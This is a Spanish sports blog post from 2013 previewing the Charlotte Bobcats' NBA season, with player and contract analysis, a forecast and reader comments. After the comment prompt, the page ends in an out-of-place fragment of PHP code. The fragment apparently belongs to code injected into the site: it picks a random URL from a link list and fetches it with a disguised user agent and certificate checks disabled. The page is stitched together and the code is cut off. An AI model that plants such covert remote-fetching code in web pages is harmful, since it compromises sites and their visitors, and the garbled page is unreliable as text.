Charlotte Bobcats: Motivos para soñar

11 de October de 2013 por Sancho88

¡Cómo ha cambiado el cuento en Charlotte! Con lo que les hemos atizado estas dos últimas temporadas, ahora van y nos dan motivos para creer en ellos de verdad. Por supuesto, este análisis no tiene nada que ver con aquel del año pasado en el cual comentábamos que deambulaban como ánimas por el purgatorio. Y es que esta temporada los Bobcats por fin molan. Poco a poco el equipo de Michael Jordan empieza a situarse en la NBA. Esta será la décima (y última) temporada de los linces rojos como tal ya que a partir del próximo 30 de junio Charlotte volverá a tener a sus avispones. Sí señores, se acabaron los penosos Bobcats. Tras el deambular de los Hornets por Nueva Orleans, Oklahoma City y New Orleans una vez más, por fin parece que la mudanza será definitiva. Los hijos pródigos volverán a casa y Charlotte volverá a tener a sus orgullosos Hornets en el escudo, puesto que New Orleans ha renunciado a su nombre post-Katrina, como todos sabemos, y ahora se llaman Pelicans.

Nunca nos acabaron de convencer estos Bobcats. Eran como los Minardi de la Fórmula 1, un equipo que daba pena por concepción. Pero a partir de ahora volverán a ganarse el respeto de la liga y no solo por el nombre, el nuevo escudo y la camiseta, sinó porque están haciendo muy bien los deberes y a su núcleo de jugadores jóvenes han añadido esta temporada a un veterano ilustre como Al Jefferson.El ex jugador de los Jazz  será el santo y seña de un equipo con trazas de Playoffs al que tan solo le falta algo de profundidad en su plantilla. 

Con la salida, por fin, de los dos jugadores tóxicos del equipo, DeSagana Diop y Tyrus Thomas (este último con el regalito de la amnistía bajo el brazo), ahora solo queda una cucaracha en el piso. Se llama Ben Gordon y estafa 13 millones por temporada pero ya está bajo control y el equipo de fumigación de Todd y sus amigos de Breaking Bad le tienen preparada una buena trampa. Es un expiring jugoso para cualquier equipo que quiera abrir hueco en su plantilla, desprenderse a su vez de otros contratos tóxicos con un traspaso o simplemente disfrutar de una metralleta de la segunda guerra mundial en unos Playoffs. Cualesquiera que sean las razones por las que un equipo de la NBA quiera hacerse con este chico, seguro que alguno las hará valer (se me ocurren los Rockets, por ejemplo), y si no, el próximo verano Charlotte quedará libre de su contrato sí o sí y podrán acometer algunas renovaciones importantes como la de Michael Kidd-Gilchrist o la de Kemba Walker.

El playmaker de los Bobcats dio el salto definitivo la pasada temporada, mejorando cualitativamente en todos los apartados del juego, y en su tercera temporada se espera de él que se acerque al nivel All-Star que se intuye que lleva dentro. Para ello tendrá que seguir trabajando en su selección de tiro y asistencias pero ya no quedan dudas de su gran influencia en el equipo. Puede ser el líder en ataque y en defensa, el termómetro que nos dirá a qué aspiran estos Bobcats.

Junto a él estará  el primer regalo serio de Michael Jordan a su afición tras muchos años: Al Jefferson. El ex de los Jazz renunció sorprendentemente a ofertas de algún contender para acabar yendo a parar a uno de los colistas de la liga. Con él las aspiraciones de los Bobcats suben automáticamente y su contrato de 13,5 millones durante dos años con una opción para el jugador de prorrogar hasta 2016 su vinculación con el equipo parece justo desde el punto de vista económico y deportivo. Seguramente sea el último gran contrato de Jefferson en la liga, al menos en el apartado salarial, pero dice mucho de él querer repartir calidad por cada una de las 30 franquicias de la NBA. No todos pueden jugar en Lakers, Celtics o Heat y está bien que equipos como los Bobcats puedan disfrutar también de un pequeño aunque efímero sueño.

En realidad no sabemos los motivos reales de Al para acabar en un equipo así, pero nos da igual. Mola la pareja ofensiva que formará con Kemba en el ataque y también su aportación al juego interior del equipo. El sorprendente y abucheado pick 4 de Cody Zeller (elegido por delante de Nerlens Noel) sigue siendo motivo de disputa para los aficionados. Quizá, Noel hubiera sido el eje defensivo junto a Gilchrist, y un jugador más compatible con Jefferson, pero los dirigentes del equipo siguen confiando en Bismack Biyombo para la intimidación en la pintura y querían dinamizar por completo el juego en la zona. Con esa intención obviamente Zeller aporta mucho más al equipo desde la segunda unidad, porque situarlo al lado de Jefferson sería como poner a un Millsap más larguirucho a su lado. De todas maneras, su ración de minutos está asegurada. En el momento en el que le inflen con muscle milk para que no lo tiren posteando, tenemos a uno de los jugadores más interesantes de esta promoción formando un buen trío de pívots junto a Jefferson y Biyombo.

Completarán la zona Josh McRoberts, Brendan Haywood y Anthony Tolliver. McRoberts fue de menos a más el año pasado, Haywood de más a menos, y Tolliver es la eterna promesa que siempre nos deja con la miel en los labios. Van a formar una rotación correcta en la pintura pero insuficiente para pelear con los mejores del Este en caso de lesión. Por tanto, el trío Jefferson-Zeller-Biyombo tiene toda la responsabilidad en sus manos.

Por fuera ya hemos comentado que el líder será Kemba Walker pero hay un elenco de jugadores muy interesantes para arropar al menudo base. Para comenzar, Gerald Henderson representa por variedad de movimientos la pieza más completa en el apartado ofensivo exterior del equipo. Su especialidad no es la defensa pero se pueden hacer cosas interesantes con él en ese apartado, y en ataque resuelve muchas situaciones en el 1×1 cuando el equipo está atascado. Firmó esta temporada también un buen contrato por 18 millones en 3 temporadas. Son cantidades muy aproximadas a su rendimiento.

Como alero titular habrá  que estar atento al salto cualitativo de Michael Kidd-Gilchrist. Su temporada rookie decepcionó a casi todo el mundo pero es un jugador muy joven y a sus 20 años podemos esperar de él un crecimiento exponencial. Si no, siempre será una pieza de un alto valor defensivo para cualquier franquicia pero sería decepcionante con las expectativas que sigue generando. Si mejora su rango de tiro exterior y sigue aprovechando su explosividad en el juego de transición los Bobcats aspirarán a la postemporada. Teóricamente debería ser el tercer pilar del equipo tras Walker y Jefferson. A ver qué es capaz de ofrecernos.

Su suplente será  Jeff Taylor. Juntos forman una gran pareja defensiva para ser dos jugadores de segundo año, con la diferencia de que Taylor tiene mejores números desde fuera pero quizá también un menor techo como jugador. Su gran Eurobasket con la selección de Suecia le debe dar alas para demostrar en la NBA todo lo que puede ofrecer tanto en ataque como en defensa. En algunas ocasiones pueden complementarse Taylor y MKG. Charlotte les necesita para mejorar atrás y ser un equipo difícil de superar.

Por último, como suplentes de Walker en el puesto de 1 estarán Ramon Sessions y Jannero Pargo. Ambos son dos jugadores muy individualistas que pueden servir de revulsivos desde la segunda línea pero no son lo que este equipo necesita. De ahí, que si bien convence bastante la rotación interior y el juego de aleros, quizá jugadores como Gordon, Sessions y Pargo no casen con la buena química que se puede formar entre el resto. En cualquier caso, son jugadores en su último año de contrato por lo que su incidencia negativa en el equipo durará más bien poco.

Charlotte debe superar este año las 30 victorias con bastante suficiencia y el año que viene renovar su backourt desde la segunda línea y encontrar un jugador para apuntalar la pintura. Si lo hacen medianamente bien, estamos hablando seguramente de un equipo de Playoffs a partir del próximo año.

Quinteto: Kemba Walker, Gerald Henderson, Michael Kidd-Gilchrist, Al Jefferson, Bismack Biyombo
6º hombre: Cody Zeller

Altas: Anthony Tolliver (Atlanta Hawks), Al Jefferson (Utah Jazz), Steve Clifford (Coach).
Bajas: Byron Mullens (Los Ángeles Clippers), Reggie Williams (Houston Rockets), Tyrus Thomas (Amnistía), DeSagana Diop (Sin equipo), Mike Dunlap (Coach).

Pronóstico:  Undécimos de Conferencia Este (35-47)

Comenta

7 comentarios a esta entrada

  1. Denise dice:
    #1

    Para empezar, confieso que echaré de menos la marca Bobcats. A mi me mola el nombre junto con el logo.

    Pues Sancho, yo creo que el titular será Zeller y a Jefferson lo moveran al 5. Yo me quedé sorprendido cuando al blanquito lo cogieron en el pick 4, pensaba que era una cagada más de los Bobcats y de hecho hay por ahí circulando el video de los seguidores de Charlotte abucheando su eleccion. Pero despues el chaval en la Summer League lo ha hecho bastante bien.
    Tambien confieso que espero bastante más de Gordon este año justo que acaba contrato.

    Por lo demás, como bien dices, por fin tienen un conjunto aseado y a pesar de que no entraran en Playoffs, seguro que daran la campanada en canchas importantes. La pareja de bases Kemba-Sessions no tiene nada que envidiarle a cualquier otra pareja de bases del Este. Después las alas las tienen bien cubiertas, cuento con la evolución y el progreso de Gilchrist, la solidez de Henderson y la motivación de Gordon por pillar otro gran contrato.
    Y luego la pintura ya no hará aguas como en años anteriores, con un All-Star como Jefferson y dos jovenzuelos con ganas de trabajar, los Bobcats deberian de dejar atrás la imagen de vertedero que han dado estos años, especialmente desde el fatidico trade que acabó con Gerald Wallace saliendo del equipo.

      Citar

  2. txusma dice:
    #2

    Ahora estaba haciendo memoria de como fue aquel traspaso y alerta pq los Bobcats se llevaron la elección de draft con la que escogieron a Tobias Harrias, que inmediatamente trasparon a los Bucks en un trade a 3 bandas donde les llegó Biyombo…
    Q vueltas q da la vida!

      Citar

  3. Sancho88 dice:
    #3

    “Cualesquiera que sean las razones por las que un equipo de la NBA quiera hacerse con este chico, seguro que alguno las hará valer (se me ocurren los Rockets, por ejemplo), …”

    http://www.nbamaniacs.com/noticias/ben-gordon-negocia-su-buyout-bulls-y-rockets-estan-al-tanto-de-su-situacion/

    Jouder… a veces tantas predicciones, rumores e inventos y chismes lanzamos en nuestros análisis que alguna vez cuelan y todo, jeje. Pues si Gordon va a los Rockets se cumpliría mi pronóstico y Deer me tendría que dar un A+, 😀

    No, hablando en serio, como cañonero para sustituir a Harden está muy bien, puede jugar 15 minutos y anotar desde fuera. Me parecería un gran refuerzo para Playoffs. Los Bulls creo que se han decantado por Fredette. Que dios los coja confesados

      Citar

  4. Vader dice:
    #4

    Como Thibs haga de Fredette un jugador aprovechable te da algo… XD

      Citar

  5. Sancho88 dice:
    #5

    Vader… qué no, que no, que no… que es imposible. Te lo juro. Lo vas a ver

      Citar

  6. TheDeerHunter dice:
    #6

    Sancho88:
    Pues si Gordon va a los Rockets se cumpliría mi pronóstico y Deer me tendría que dar un A+,

    Sería una buena baza… pero te da para aprobado pelao XD

      Citar

  7. rumbero dice:
    #7

    Pues los Bobcats han cortado hoy oficialmente a Ben Gordon, con lo que no podrá disputar playoffs con ningún equipo ya que estará fuera de plazo. Buen rollete entre Bobcats y Gordon

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>